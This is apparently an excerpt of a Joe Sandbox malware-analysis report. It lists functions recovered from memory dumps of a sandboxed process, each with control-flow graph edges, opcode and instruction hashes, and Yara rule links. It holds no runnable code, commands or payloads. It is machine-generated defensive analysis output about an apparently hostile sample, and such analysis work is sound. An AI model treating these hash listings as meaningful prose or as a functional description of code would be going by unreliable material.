                                                            Function 00007FFD9BADE749 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 116 7ffd9bade749-7ffd9bade77a 117 7ffd9bade77e-7ffd9bade783 116->117
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 826f3a309edff466fd70b49ff79fb9b49b1833d49c2aedab3ffc4934436f2192
                                                            • Instruction ID: d8894da4b7f7c98b0cfdc876a16aae7bbffb31ce6b5f48c07f8384fe35cc7d49
                                                            • Opcode Fuzzy Hash: 826f3a309edff466fd70b49ff79fb9b49b1833d49c2aedab3ffc4934436f2192
                                                            • Instruction Fuzzy Hash: CBE0927160E3C44FCB16EA3488688557FA0EF6721174A41EEC046CF2A7EA2DCC85CB11
                                                            Function 00007FFD9BAC39D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 118 7ffd9bac39d9-7ffd9bac3a0a 119 7ffd9bac3a0e-7ffd9bac3a13 118->119
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: ebeea7a7c8bccfb2efc55ad893bf075d90949d869f244bda84a7a4eecc01cd59
                                                            • Instruction ID: 1002582cf5f2ccafddfc863c7682c61c0d3933425471da4f07653642da35bd44
                                                            • Opcode Fuzzy Hash: ebeea7a7c8bccfb2efc55ad893bf075d90949d869f244bda84a7a4eecc01cd59
                                                            • Instruction Fuzzy Hash: 46E0127164E3C44FCB16EB7488688557FA0EF6721174A52EEC046CF2A7EA2DC889C701
                                                            Function 00007FFD9BAE2049 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 120 7ffd9bae2049-7ffd9bae207a 122 7ffd9bae207e-7ffd9bae2083 120->122
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 2b8219639f70dcf761d23ba0655dcb24f50d1e3ee780cf0914a6e824a06fd6a3
                                                            • Instruction ID: a988b9da13124015d4612381725422ff9c23072d902d318248aa229de2ed6dc9
                                                            • Opcode Fuzzy Hash: 2b8219639f70dcf761d23ba0655dcb24f50d1e3ee780cf0914a6e824a06fd6a3
                                                            • Instruction Fuzzy Hash: 08E0927164E3C08FCB1AEB348468854BF60EE6720174A42EEC046CF2A3EA2DC886C711
                                                            Function 00007FFD9BAE8509 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 123 7ffd9bae8509-7ffd9bae8534 124 7ffd9bae8538-7ffd9bae853d 123->124
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 1cfc704cb558f1f41bf9c0021a4382b16b4238e60e947ea8f684b14f72bd1c21
                                                            • Instruction ID: ecb97c41836639681ef3de0c8f7aa766486fa9b27053d7923fb4e6ed57c0e5d4
                                                            • Opcode Fuzzy Hash: 1cfc704cb558f1f41bf9c0021a4382b16b4238e60e947ea8f684b14f72bd1c21
                                                            • Instruction Fuzzy Hash: 58E01A7154E3C44FCB06AB7488658553FA09E6721078B40EEC185CF1B7E62D8949C701
                                                            Function 00007FFD9BAEAFB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 128 7ffd9baeafb9-7ffd9baeafe4 130 7ffd9baeafe8-7ffd9baeafed 128->130
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 8882ad55bcf5f52393b0e640724a1bc85650f9c31366d4eafabf16b67813512f
                                                            • Instruction ID: 5f7424b07321442c6af0e6f59ee6e846ed512e5bc515555ecea39e9e27f8ee3d
                                                            • Opcode Fuzzy Hash: 8882ad55bcf5f52393b0e640724a1bc85650f9c31366d4eafabf16b67813512f
                                                            • Instruction Fuzzy Hash: 8AE01AA154F7C44FCB16EB75887A9457FA0AE6731078B40EEC086CF1B3E62D8849C701
                                                            Function 00007FFD9BAE20D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 125 7ffd9bae20d9-7ffd9bae20ed 126 7ffd9bae20ef-7ffd9bae2104 125->126 127 7ffd9bae2108-7ffd9bae210d 126->127
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 22f9e36b38db81caa11c36c8f5bc4dfa28655aa9d38dd7dad7449236590e9fc6
                                                            • Instruction ID: 32b4e303d5c61de99b80747e838b10004c683df3c7191817774f56aed008e380
                                                            • Opcode Fuzzy Hash: 22f9e36b38db81caa11c36c8f5bc4dfa28655aa9d38dd7dad7449236590e9fc6
                                                            • Instruction Fuzzy Hash: BCE01A6194F7C44FCB1AEB74886A9487FA0AE6731078B40EEC089CF1B3E62D9849C701
                                                            Function 00007FFD9BAC0906 Relevance: .9, Instructions: 868COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 7ffd9bac0906-7ffd9bac0989 135 7ffd9bac0997-7ffd9bac09a2 131->135 136 7ffd9bac098b 131->136 137 7ffd9bac09bd 135->137 138 7ffd9bac09a4-7ffd9bac09af 135->138 136->135 139 7ffd9bac09c2-7ffd9bac09fc 137->139 138->139 140 7ffd9bac09b1-7ffd9bac09b8 138->140 139->137 148 7ffd9bac09fe-7ffd9bac0b74 139->148 142 7ffd9bac166d-7ffd9bac170a call 7ffd9bac2338 140->142 180 7ffd9bac0b7a-7ffd9bac0b8a 148->180 181 7ffd9bac10b9-7ffd9bac10ef 148->181 184 7ffd9bac0b90-7ffd9bac0c63 180->184 189 7ffd9bac1168-7ffd9bac119d 181->189 190 7ffd9bac10f1-7ffd9bac1130 181->190 225 7ffd9bac0c65-7ffd9bac0c8e 184->225 226 7ffd9bac0c94-7ffd9bac0ce3 184->226 201 7ffd9bac11a3-7ffd9bac1265 189->201 202 7ffd9bac12f1-7ffd9bac131b 189->202 203 7ffd9bac114a-7ffd9bac1166 190->203 204 7ffd9bac1132-7ffd9bac1135 190->204 266 7ffd9bac1267-7ffd9bac12aa 201->266 267 7ffd9bac12ac-7ffd9bac12af 201->267 213 7ffd9bac1367-7ffd9bac136a 202->213 214 7ffd9bac131d-7ffd9bac133a 202->214 203->189 203->190 204->203 205 7ffd9bac1137-7ffd9bac1147 204->205 205->203 218 7ffd9bac1371-7ffd9bac13a6 213->218 219 7ffd9bac14ab-7ffd9bac14b3 214->219 220 7ffd9bac1340-7ffd9bac1365 214->220 242 7ffd9bac144c-7ffd9bac1462 218->242 243 7ffd9bac13ac-7ffd9bac13b7 218->243 232 7ffd9bac14b4-7ffd9bac14b9 219->232 220->213 225->226 257 7ffd9bac0ce5-7ffd9bac0cea 226->257 258 7ffd9bac0cef-7ffd9bac0d27 226->258 235 7ffd9bac1467-7ffd9bac1482 232->235 236 7ffd9bac14bb-7ffd9bac14cf 232->236 255 7ffd9bac1489-7ffd9bac14a4 235->255 236->142 242->142 250 7ffd9bac13ca-7ffd9bac13ff 243->250 251 7ffd9bac13b9-7ffd9bac13c7 243->251 250->255 272 7ffd9bac1405-7ffd9bac1410 250->272 251->250 255->219 261 7ffd9bac10a3-7ffd9bac10b3 257->261 279 7ffd9bac0d29-7ffd9bac0d2e 258->279 280 7ffd9bac0d33-7ffd9bac0d6b 258->280 261->181 261->184 277 7ffd9bac12d1-7ffd9bac12eb 266->277 270 7ffd9bac12c4-7ffd9bac12c5 267->270 271 7ffd9bac12b1-7ffd9bac12c2 267->271 270->277 271->277 272->137 275 7ffd9bac1416-7ffd9bac1420 272->275 275->232 281 7ffd9bac1426-7ffd9bac1446 275->281 277->201 277->202 279->261 290 7ffd9bac0d77-7ffd9bac0daf 280->290 291 7ffd9bac0d6d-7ffd9bac0d72 280->291 281->242 281->243 296 7ffd9bac0dbb-7ffd9bac0dc4 290->296 297 7ffd9bac0db1-7ffd9bac0db6 290->297 291->261 296->261 297->261
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c8c804cc29cfb3101e5303cbb1313ac6d33a397f5eeff36c78c181403b5bf5a6
                                                            • Instruction ID: c04028bb1a2d5d654ee1d6bf289b29b11b1b5bd3ac0776f7c7193521e371b185
                                                            • Opcode Fuzzy Hash: c8c804cc29cfb3101e5303cbb1313ac6d33a397f5eeff36c78c181403b5bf5a6
                                                            • Instruction Fuzzy Hash: 9052B431B1991E4FEBA8FB5884A56B873A2FF64314F0105B9D45EC32D7DE78AD818B40
                                                            Function 00007FFD9BAC15F8 Relevance: .7, Instructions: 720COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 299 7ffd9bac15f8-7ffd9bac1611 300 7ffd9bac1613-7ffd9bac162e 299->300 301 7ffd9bac1632-7ffd9bac1643 299->301 306 7ffd9bac1630 300->306 304 7ffd9bac1649-7ffd9bac1657 301->304 305 7ffd9bac09bd-7ffd9bac09fc 301->305 304->301 307 7ffd9bac1659-7ffd9bac1668 304->307 321 7ffd9bac09fe-7ffd9bac0b74 305->321 306->307 311 7ffd9bac142c-7ffd9bac1446 307->311 312 7ffd9bac166d-7ffd9bac170a call 7ffd9bac2338 307->312 319 7ffd9bac13ac-7ffd9bac13b7 311->319 320 7ffd9bac144c-7ffd9bac1462 311->320 325 7ffd9bac13ca-7ffd9bac13ff 319->325 326 7ffd9bac13b9-7ffd9bac13c7 319->326 320->312 374 7ffd9bac0b7a-7ffd9bac0b8a 321->374 375 7ffd9bac10b9-7ffd9bac10ef 321->375 338 7ffd9bac1405-7ffd9bac1410 325->338 339 7ffd9bac1489-7ffd9bac14a4 325->339 326->325 338->305 341 7ffd9bac1416-7ffd9bac1420 338->341 354 7ffd9bac14ab-7ffd9bac14b3 339->354 344 7ffd9bac1426-7ffd9bac1429 341->344 345 7ffd9bac14b4-7ffd9bac14b9 341->345 344->311 349 7ffd9bac1467-7ffd9bac1482 345->349 350 7ffd9bac14bb-7ffd9bac14cf 345->350 349->339 350->312 354->345 378 7ffd9bac0b90-7ffd9bac0c63 374->378 383 7ffd9bac1168-7ffd9bac119d 375->383 384 7ffd9bac10f1-7ffd9bac1130 375->384 418 7ffd9bac0c65-7ffd9bac0c8e 378->418 419 7ffd9bac0c94-7ffd9bac0ce3 378->419 395 7ffd9bac11a3-7ffd9bac1265 383->395 396 7ffd9bac12f1-7ffd9bac131b 383->396 397 7ffd9bac114a-7ffd9bac1166 384->397 398 7ffd9bac1132-7ffd9bac1135 384->398 441 7ffd9bac1267-7ffd9bac12aa 395->441 442 7ffd9bac12ac-7ffd9bac12af 395->442 407 7ffd9bac1367-7ffd9bac136a 396->407 408 7ffd9bac131d-7ffd9bac133a 396->408 397->383 397->384 398->397 399 7ffd9bac1137-7ffd9bac1147 398->399 399->397 412 7ffd9bac1371-7ffd9bac13a6 407->412 408->354 413 7ffd9bac1340-7ffd9bac1365 408->413 412->319 412->320 413->407 418->419 435 7ffd9bac0ce5-7ffd9bac0cea 419->435 436 7ffd9bac0cef-7ffd9bac0d27 419->436 438 7ffd9bac10a3-7ffd9bac10b3 435->438 451 7ffd9bac0d29-7ffd9bac0d2e 436->451 452 7ffd9bac0d33-7ffd9bac0d6b 436->452 438->375 438->378 449 7ffd9bac12d1-7ffd9bac12eb 441->449 444 7ffd9bac12c4-7ffd9bac12c5 442->444 445 7ffd9bac12b1-7ffd9bac12c2 442->445 444->449 445->449 449->395 449->396 451->438 459 7ffd9bac0d77-7ffd9bac0daf 452->459 460 7ffd9bac0d6d-7ffd9bac0d72 452->460 465 7ffd9bac0dbb-7ffd9bac0dc4 459->465 466 7ffd9bac0db1-7ffd9bac0db6 459->466 460->438 465->438 466->438
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 994101ea9d8d2e467351da7202a264e86d923af5fced9987559590a121ee6c54
                                                            • Instruction ID: 69a79e48e979768bc06870e1049a2fe89bb85836e1ed5f2b699b4f0b95b3fcb3
                                                            • Opcode Fuzzy Hash: 994101ea9d8d2e467351da7202a264e86d923af5fced9987559590a121ee6c54
                                                            • Instruction Fuzzy Hash: 0432B631F1D95E4BEBA8FB5884A16B873A2FF64314F0146B9D05EC32D7DD38A9818B41
                                                            Function 00007FFD9BAC0DC7 Relevance: .6, Instructions: 559COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 468 7ffd9bac0dc7-7ffd9bac0df3 471 7ffd9bac0df5-7ffd9bac0dfa 468->471 472 7ffd9bac0dff-7ffd9bac0e37 468->472 473 7ffd9bac10a3-7ffd9bac10b3 471->473 483 7ffd9bac0e39-7ffd9bac0e3e 472->483 484 7ffd9bac0e43-7ffd9bac0e7b 472->484 475 7ffd9bac10b9-7ffd9bac10ef 473->475 476 7ffd9bac0b90-7ffd9bac0c63 473->476 488 7ffd9bac1168-7ffd9bac119d 475->488 489 7ffd9bac10f1-7ffd9bac1130 475->489 527 7ffd9bac0c65-7ffd9bac0c8e 476->527 528 7ffd9bac0c94-7ffd9bac0ce3 476->528 483->473 499 7ffd9bac0e87-7ffd9bac0ebf 484->499 500 7ffd9bac0e7d-7ffd9bac0e82 484->500 505 7ffd9bac11a3-7ffd9bac1265 488->505 506 7ffd9bac12f1-7ffd9bac131b 488->506 507 7ffd9bac114a-7ffd9bac1166 489->507 508 7ffd9bac1132-7ffd9bac1135 489->508 518 7ffd9bac0ecb-7ffd9bac0f03 499->518 519 7ffd9bac0ec1-7ffd9bac0ec6 499->519 500->473 592 7ffd9bac1267-7ffd9bac12aa 505->592 593 7ffd9bac12ac-7ffd9bac12af 505->593 521 7ffd9bac1367-7ffd9bac136a 506->521 522 7ffd9bac131d-7ffd9bac133a 506->522 507->488 507->489 508->507 510 7ffd9bac1137-7ffd9bac1147 508->510 510->507 546 7ffd9bac0f05-7ffd9bac0f0a 518->546 547 7ffd9bac0f0f-7ffd9bac0f1a 518->547 519->473 529 7ffd9bac1371-7ffd9bac13a6 521->529 530 7ffd9bac14ab-7ffd9bac14b3 522->530 531 7ffd9bac1340-7ffd9bac1365 522->531 527->528 569 7ffd9bac0ce5-7ffd9bac0cea 528->569 570 7ffd9bac0cef-7ffd9bac0d27 528->570 558 7ffd9bac144c-7ffd9bac1462 529->558 559 7ffd9bac13ac-7ffd9bac13b7 529->559 545 7ffd9bac14b4-7ffd9bac14b9 530->545 531->521 549 7ffd9bac1467-7ffd9bac1482 545->549 550 7ffd9bac14bb-7ffd9bac14cf 545->550 546->473 561 7ffd9bac0f1c-7ffd9bac0f2f 547->561 562 7ffd9bac0f31-7ffd9bac0f47 547->562 579 7ffd9bac1489-7ffd9bac14a4 549->579 557 7ffd9bac166d-7ffd9bac170a call 7ffd9bac2338 550->557 558->557 573 7ffd9bac13ca-7ffd9bac13ff 559->573 574 7ffd9bac13b9-7ffd9bac13c7 559->574 561->562 580 7ffd9bac0f49-7ffd9bac0f4e 562->580 581 7ffd9bac0f53-7ffd9bac0f8b 562->581 569->473 601 7ffd9bac0d29-7ffd9bac0d2e 570->601 602 7ffd9bac0d33-7ffd9bac0d6b 570->602 573->579 599 7ffd9bac1405-7ffd9bac1410 573->599 574->573 579->530 580->473 608 7ffd9bac0f97-7ffd9bac0fa0 581->608 609 7ffd9bac0f8d-7ffd9bac0f92 581->609 611 7ffd9bac12d1-7ffd9bac12eb 592->611 597 7ffd9bac12c4-7ffd9bac12c5 593->597 598 7ffd9bac12b1-7ffd9bac12c2 593->598 597->611 598->611 605 7ffd9bac1416-7ffd9bac1420 599->605 606 7ffd9bac09bd-7ffd9bac09fc 599->606 601->473 626 7ffd9bac0d77-7ffd9bac0daf 602->626 627 7ffd9bac0d6d-7ffd9bac0d72 602->627 605->545 613 7ffd9bac1426-7ffd9bac1446 605->613 634 7ffd9bac09fe-7ffd9bac0b74 606->634 608->473 609->473 611->505 611->506 613->558 613->559 637 7ffd9bac0dbb-7ffd9bac0dc4 626->637 638 7ffd9bac0db1-7ffd9bac0db6 626->638 627->473 634->475 664 7ffd9bac0b7a-7ffd9bac0b8a 634->664 637->473 638->473 664->476
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ef721f84cd45570a13f169f343cb6e5f95dbd6147081abacb0e77bcd6a1b3d2
                                                            • Instruction ID: 54307a836e87ff066538eb207ae9e362add358fb8e6abc023514ae61c38d2fbe
                                                            • Opcode Fuzzy Hash: 7ef721f84cd45570a13f169f343cb6e5f95dbd6147081abacb0e77bcd6a1b3d2
                                                            • Instruction Fuzzy Hash: AD02C731F1991E4FEBA8FB588461A7873A2FFA4714F0105B9E05EC72D6DE78AD428740
                                                            Function 00007FFD9BAC0FA9 Relevance: .5, Instructions: 483COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 666 7ffd9bac0fa9-7ffd9bac0fcf 669 7ffd9bac0fdb-7ffd9bac1013 666->669 670 7ffd9bac0fd1-7ffd9bac0fd6 666->670 681 7ffd9bac1015-7ffd9bac101a 669->681 682 7ffd9bac101f-7ffd9bac1057 669->682 671 7ffd9bac10a3-7ffd9bac10b3 670->671 673 7ffd9bac10b9-7ffd9bac10ef 671->673 674 7ffd9bac0b90-7ffd9bac0c63 671->674 686 7ffd9bac1168-7ffd9bac119d 673->686 687 7ffd9bac10f1-7ffd9bac1130 673->687 724 7ffd9bac0c65-7ffd9bac0c8e 674->724 725 7ffd9bac0c94-7ffd9bac0ce3 674->725 681->671 697 7ffd9bac1059-7ffd9bac105e 682->697 698 7ffd9bac1060-7ffd9bac1098 682->698 703 7ffd9bac11a3-7ffd9bac1265 686->703 704 7ffd9bac12f1-7ffd9bac131b 686->704 705 7ffd9bac114a-7ffd9bac1166 687->705 706 7ffd9bac1132-7ffd9bac1135 687->706 697->671 719 7ffd9bac109a-7ffd9bac109f 698->719 720 7ffd9bac10a1 698->720 776 7ffd9bac1267-7ffd9bac12aa 703->776 777 7ffd9bac12ac-7ffd9bac12af 703->777 717 7ffd9bac1367-7ffd9bac136a 704->717 718 7ffd9bac131d-7ffd9bac133a 704->718 705->686 705->687 706->705 707 7ffd9bac1137-7ffd9bac1147 706->707 707->705 726 7ffd9bac1371-7ffd9bac13a6 717->726 727 7ffd9bac14ab-7ffd9bac14b3 718->727 728 7ffd9bac1340-7ffd9bac1365 718->728 719->671 720->671 724->725 758 7ffd9bac0ce5-7ffd9bac0cea 725->758 759 7ffd9bac0cef-7ffd9bac0d27 725->759 750 7ffd9bac144c-7ffd9bac1462 726->750 751 7ffd9bac13ac-7ffd9bac13b7 726->751 740 7ffd9bac14b4-7ffd9bac14b9 727->740 728->717 742 7ffd9bac1467-7ffd9bac1482 740->742 743 7ffd9bac14bb-7ffd9bac14cf 740->743 767 7ffd9bac1489-7ffd9bac14a4 742->767 749 7ffd9bac166d-7ffd9bac170a call 7ffd9bac2338 743->749 750->749 761 7ffd9bac13ca-7ffd9bac13ff 751->761 762 7ffd9bac13b9-7ffd9bac13c7 751->762 758->671 785 7ffd9bac0d29-7ffd9bac0d2e 759->785 786 7ffd9bac0d33-7ffd9bac0d6b 759->786 761->767 783 7ffd9bac1405-7ffd9bac1410 761->783 762->761 767->727 792 7ffd9bac12d1-7ffd9bac12eb 776->792 781 7ffd9bac12c4-7ffd9bac12c5 777->781 782 7ffd9bac12b1-7ffd9bac12c2 777->782 781->792 782->792 788 7ffd9bac1416-7ffd9bac1420 783->788 789 7ffd9bac09bd-7ffd9bac09fc 783->789 785->671 806 7ffd9bac0d77-7ffd9bac0daf 786->806 807 7ffd9bac0d6d-7ffd9bac0d72 786->807 788->740 794 7ffd9bac1426-7ffd9bac1446 788->794 814 7ffd9bac09fe-7ffd9bac0b74 789->814 792->703 792->704 794->750 794->751 817 7ffd9bac0dbb-7ffd9bac0dc4 806->817 818 7ffd9bac0db1-7ffd9bac0db6 806->818 807->671 814->673 844 7ffd9bac0b7a-7ffd9bac0b8a 814->844 817->671 818->671 844->674
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08d225eca287cacb967aab8bccb77b224b14fb76768718b6a0180d0c2678cb35
                                                            • Instruction ID: 3388cc396b953361e6e0eec275a9f0a1fd7885ff4d6d2baf89b3ac7fa1989e04
                                                            • Opcode Fuzzy Hash: 08d225eca287cacb967aab8bccb77b224b14fb76768718b6a0180d0c2678cb35
                                                            • Instruction Fuzzy Hash: A7F1B631F1991E4FEBA8FB5884A567873A2FFA4314F0105B9D41EC72D6DE78AD428B40
                                                            Function 00007FFD9BAE377D Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39eeb9d5ad0949bffa954aa307e091a93ba01affd9c77b305abc90739e3cbf09
                                                            • Instruction ID: fd3c4d3cc78ad26c81e6d88974c0dd3ac99c7ba02867d6643bddfe9136aa734a
                                                            • Opcode Fuzzy Hash: 39eeb9d5ad0949bffa954aa307e091a93ba01affd9c77b305abc90739e3cbf09
                                                            • Instruction Fuzzy Hash: AD914621F1DE4E0FEBA8EB5884766B873D2EF98354F4041B9E40DC72E7DD68A9458380
                                                            Function 00007FFD9BAD93D3 Relevance: .2, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7301f43453d6dd200a0e990b05d35ef8991a4272402defa80088b6dba0b7dcec
                                                            • Instruction ID: e5fe9915d69d99e75fc04671da8e8a395f0373df092cfa2c4ff46d385cb92243
                                                            • Opcode Fuzzy Hash: 7301f43453d6dd200a0e990b05d35ef8991a4272402defa80088b6dba0b7dcec
                                                            • Instruction Fuzzy Hash: 3261B430B199194FEB58EB68C4A5AB973E2FFD8314F514279E01DC72D6CE38E9428741
                                                            Function 00007FFD9BAD946D Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bad3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35777241e2066ecc0b0c91842996b2e004c2c3753505d3d030b1e103439656ba
                                                            • Instruction ID: f30e0cb166cb95daffb5c1de3769d22ceae816b12ceb7f4da3d9e46e8da23756
                                                            • Opcode Fuzzy Hash: 35777241e2066ecc0b0c91842996b2e004c2c3753505d3d030b1e103439656ba
                                                            • Instruction Fuzzy Hash: 19419030B0890D5FDB54EF69C468AA973E1FF98310F510279E01DC72E6CB39E8418B80
                                                            Function 00007FFD9BAEB58C Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24746833f9fc46f32da4aa8a8d877d970bd90d43be6f248aba7f4758b3d29a8d
                                                            • Instruction ID: db876a0ecbd9147c0351a1b43d7756ba0880e7b7d1931c59c7857eb835a1013b
                                                            • Opcode Fuzzy Hash: 24746833f9fc46f32da4aa8a8d877d970bd90d43be6f248aba7f4758b3d29a8d
                                                            • Instruction Fuzzy Hash: 3C310321B19D4E4FEBA4E75C88E96B873C1EF98350F8501BAE00DC31E2DE38AC014341
                                                            Function 00007FFD9BAE27C8 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.2052101559.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_7ffd9bae1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 901f499c780a1014cd138009878f7b67c48aed1b2f3c68d52cf13ba1144272af
                                                            • Instruction ID: d30a1a431ec5318449d63fde1c2c524a87715e9c3e0639499542a9e2938d95c4
                                                            • Opcode Fuzzy Hash: 901f499c780a1014cd138009878f7b67c48aed1b2f3c68d52cf13ba1144272af
